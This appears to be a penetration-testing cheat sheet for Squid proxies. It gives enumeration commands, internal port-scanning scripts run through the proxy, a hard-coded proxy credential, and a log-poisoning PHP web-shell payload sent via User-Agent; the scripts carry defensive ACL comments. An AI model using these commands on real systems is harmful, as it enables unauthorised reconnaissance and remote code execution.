3128 - Squid
Information
Default Port: 3128
PORT STATE SERVICE
3128/tcp open squid-http
Files
/etc/squid/squid.conf
/var/log/squid/access.log
/var/log/squid/cache.log
Enumeration
nmap -p3128 -sS 192.168.1.2
nmap -p3128 -sVC 192.168.1.2
Check Auth
# -x/--proxy = proxy
curl -s --proxy "http://192.168.1.2:3128" 127.0.0.1:80
curl -s --proxy "http://192.168.1.2:3128" 127.0.0.1:80 |html2text
#or
curl -s -x "http://192.168.1.2:3128" 127.0.0.1:80
curl -s -x "http://192.168.1.2:3128" 127.0.0.1:80 |html2text
Output (Auth: NO)
❯ curl -s --proxy "http://192.168.1.2:3128/" "http://127.0.0.1:80" | html2text
[Debian Logo]Apache2 Debian Default Page
It works!
This is the default welcome page used to test the correct operation of the
Apache2 server after installation on Debian systems. If you can read this page,
it means that the Apache HTTP server installed at this site is working
properly. You should replace this file (located at /var/www/html/index.html)
before continuing to operate your HTTP server.
Output (Auth: YES)
Cache Access Denied
❯ curl -s --proxy "http://192.168.1.2:3128" "http://127.0.1:80" | html2text
****** ERROR ******
***** Cache Access Denied. *****
===============================================================================
The following error was encountered while trying to retrieve the URL: http://
127.0.0.1/
Cache Access Denied.
Sorry, you are not currently allowed to request http://127.0.0.1/ from this
cache until you have authenticated yourself.
Please contact the cache administrator if you have difficulties authenticating
yourself.
===============================================================================
Generated Wed, 10 Sep 2025 08:17:35 GMT by tunnel (squid/5.7)
Proxy
Services
Spose
python3 spose.py --proxy http://192.168.1.2:3128 --target 127.0.0.1 --ports 21,22
python3 spose.py --proxy http://192.168.1.2:3128 --target 127.0.0.1 --allports
SSH
ssh -o ProxyCommand="corkscrew 192.168.1.2 3128 %h %p" jeff@127.0.0.1
ssh -o ProxyCommand="ncat --proxy 192.168.1.2:3128 --proxy-type http %h %p" jeff@127.0.0.1
proxychains ssh m.davis@127.0.0.1
FTP
lftp -e "set ftp:proxy http://192.168.1.2:3128; open ftp://anonymous@127.0.0.1"
Corkscrew
corkscrew 192.168.1.2 3128 127.0.0.1 22
corkscrew 192.168.1.2 3128 127.0.0.1 21
cURL
# -x/--proxy = proxy
# -U/--proxy-user = proxy auth
# auth: no
curl --proxy "http://192.168.1.2:3128" "http://127.0.0.1:8000/"
curl -x "http://192.168.1.2:3128" "http://127.0.0.1:8000/"
# auth: yes
curl --proxy "http://192.168.1.2:3128" --proxy-user "proxy:Pr0xyH@sTh3P0w3r" "http://127.0.0.1:8000/"
curl -x "http://192.168.1.2:3128" -U "proxy:Pr0xyH@sTh3P0w3r" "http://127.0.0.1:8000"
Fuzzing
# auth: no
gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://127.0.0.1:1234/ --proxy 'http://192.168.1.2:3128' -b 404
# auth: yes
gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://127.0.0.1:8000/' --proxy 'http://proxy:Pr0xyH%40sTh3P0w3r@192.168.1.2:3128' -b 404
dirsearch -w /opt/directory-list-2.3-medium.txt -u "http://127.0.0.1:8000" --proxy "http://192.168.1.2:3128" --proxy-auth "proxy:Pr0xyH@sTh3P0w3r"
Internal Port Discovery
Corkscrew
#!/bin/bash
# Walks TCP ports 1-65535 on INTERNAL through the Squid proxy using corkscrew.
# Heuristic: each attempt is cut off by `timeout` after 0.1s. Exit status 124
# means corkscrew was still running at the cutoff, which is reported as OPEN.
# A slow proxy would presumably produce the same status; verify hits by hand.
#
# Defender view: corkscrew tunnels with HTTP CONNECT, so this depends on the
# proxy ACLs allowing CONNECT to loopback on arbitrary ports. Squid rules such
# as `http_access deny CONNECT !SSL_ports` and `http_access deny to_localhost`
# block it. A run should show in access.log as a burst of CONNECT requests
# from one client to sequential ports.

# ANSI colour escapes, interpreted by `echo -e` below.
GREEN="\e[92m"
YELLOW="\e[93m"
RED="\e[91m"
WHITE="\e[97m"
END="\e[0m"

internal_host="127.0.0.1"
# Proxy host and port kept as separate words, as corkscrew expects them.
proxy_endpoint=(192.168.1.2 3128)

echo
for ((port = 1; port <= 65535; port++)); do
  # Anything the service sent before the cutoff is captured; stderr is dropped.
  banner=$(timeout 0.1 corkscrew "${proxy_endpoint[@]}" "${internal_host}" "${port}" 2>/dev/null)
  status=$?

  # Only a timeout (124) counts as a hit; every other status is skipped.
  ((status == 124)) || continue

  echo -e "${GREEN}[+] ${WHITE}Internal Port: ${YELLOW}${port} ${GREEN}(OPEN) ${RED}${banner}${END}"
done
cURL
Auth: NO
#!/bin/bash
# Requests http://127.0.0.1:<port> through an unauthenticated Squid proxy for
# every port 1-65535 and prints the ports whose response status is 200.
# Only HTTP services answering 200 are reported. No --max-time is set, so a
# single unresponsive port can stall the loop.
#
# Defender view: this works only while the proxy ACLs permit requests to
# loopback on non-standard ports. Squid rules such as
# `http_access deny !Safe_ports` and `http_access deny to_localhost` stop it.
# access.log should show one client requesting 127.0.0.1 on sequential ports.

# ANSI colour escapes, interpreted by `echo -e` below.
readonly GREEN="\e[92m"
readonly YELLOW="\e[93m"
readonly WHITE="\e[97m"
readonly END="\e[0m"

proxy="http://192.168.1.2:3128"
url="http://127.0.0.1"

echo
port=1
while ((port <= 65535)); do
  # Body is discarded; only the numeric status code is kept.
  status=$(curl --silent --output /dev/null --write-out '%{http_code}' \
    --proxy "$proxy" "${url}:${port}")

  if [[ "$status" -eq 200 ]]; then
    echo -e "${GREEN}[+] ${WHITE}Internal Port: ${YELLOW}${port} ${GREEN}(OPEN)${END}"
  fi

  port=$((port + 1))
done
Auth: YES
#!/bin/bash
# Same probe as the unauthenticated variant, but sends proxy credentials and
# caps each request at one second. Covers ports START_PORT..END_PORT and prints
# those whose HTTP status through the proxy is 200.
#
# NOTE(review): the credential is hard-coded and passed to curl on the command
# line, so it sits in this file and may be visible in the process list while
# the loop runs.
#
# Defender view: authentication alone does not stop this. The proxy ACLs still
# have to deny loopback and non-standard ports, e.g. Squid
# `http_access deny to_localhost` and `http_access deny !Safe_ports`.

# ANSI colour escapes, interpreted by `echo -e` below.
GREEN="\e[92m"
YELLOW="\e[93m"
WHITE="\e[97m"
END="\e[0m"

PROXY="http://192.168.1.2:3128"
PROXY_AUTH='proxy:Pr0xyH@sTh3P0w3r'
URL="http://127.0.0.1"
START_PORT=1
END_PORT=10000

echo
for ((port = START_PORT; port <= END_PORT; port++)); do
  # Body is discarded; only the numeric status code is kept.
  status=$(curl -s -o /dev/null -w "%{http_code}" --max-time 1 \
    --proxy "$PROXY" --proxy-user "$PROXY_AUTH" "${URL}:${port}")

  [[ "$status" -eq 200 ]] || continue

  echo -e "${GREEN}[+] ${WHITE}Internal Port: ${YELLOW}${port} ${GREEN}(OPEN)${END}"
done
Xargs
seq 1 65535 | xargs -P 50 -I {} sh -c 'curl -U proxy:Pr0xyH@sTh3P0w3r -x http://192.168.1.2:3128 http://127.0.0.1:{} -s -o /dev/null -w "%{http_code} {}\n" -m 1 2>/dev/null | grep "^200" | cut -d" " -f2'
Wfuzz
wfuzz -c -p 192.168.1.2:3128 -z range,1-65535 -u "http://127.0.0.1:FUZZ" --sc=200
Nmap
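# NOTE: the "http <host> <port>" entry below is proxychains [ProxyList] syntax, not a Squid directive; it belongs in the proxychains config (commonly /etc/proxychains4.conf or /etc/proxychains.conf), not in squid.conf.
nano /etc/squid/squid.conf
http 192.168.1.2 3128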
proxychains nmap -p1-500 -sT 127.0.0.1 2>/dev/null
proxychains nmap -p21,22 -sTVC 127.0.0.1 2>/dev/null
Log Poisoning
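# User-Agent: <?php system($_GET['cmd']); ?>
# Depends on a separate file-inclusion flaw (file.php below) and on the web server account being able to read Squid's access.log; fixing the include and keeping the log unreadable to the web user closes this path.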
curl -sX GET --proxy "http://192.168.1.2:3128" "http://127.0.0.1:80" -A '<?php system($_GET["cmd"]); ?>'
http://192.168.1.2/file.php?file=/var/log/squid/access.log&cmd=id